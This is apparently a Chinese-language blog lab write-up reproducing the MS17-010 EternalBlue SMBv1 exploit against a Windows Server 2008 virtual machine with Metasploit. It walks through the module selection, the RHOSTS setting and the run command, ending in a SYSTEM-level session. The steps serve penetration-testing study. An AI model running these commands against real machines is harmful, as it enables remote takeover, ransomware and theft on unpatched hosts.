Metaspoilt對(永恆之藍)ms17-010的復現檢測

前言:

MS17-010是一個安全類型的補丁,MS17-010更新修復了 Microsoft Windows中的漏洞。
如果攻擊者向Microsoft 服務器消息塊 1.0 (SMBv1) 服務器發送經特殊設計的消息,則其中最嚴重的漏洞可能允許遠程代碼執行。2017年,The Shadow Brokers決定公開一部分有價值的工具,其中“eternalblue”(永恆之藍)就是其中之一(漏洞編號ms17-010)Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。
漏洞影響:目前已知受影響的 Windows 版本包括但不限於:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server2012 SP0。

復現利用:

攻擊機:kali
靶機:win2008 server ip地址:192.168.107.164
第一步:打開msf,運行命令msfconsole
在這裏插入圖片描述
第二步:搜索ms17-010,命令search ms17-010
在這裏插入圖片描述
第三步:選擇使用exploit/windows/smb/ms17_010_eternalblue 攻擊模塊,命令 use exploit/windows/smb/ms17_010_eternalblue ,然後執行options,查看該攻擊模塊需要的參數。
在這裏插入圖片描述第四步:設置Rhosts ,也就是靶機,命令 set Rhosts 192.168.107.164,設置好了以後,執行options查看參數是否 正確。
在這裏插入圖片描述第五步:確認無誤後,run執行。
在這裏插入圖片描述
根據提示可以看到, host is likely vulnerable 說明漏洞是存在,並且是易攻擊的,沒過一會兒,msf中返回一個session。執行whoami 便是system最高權限。
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章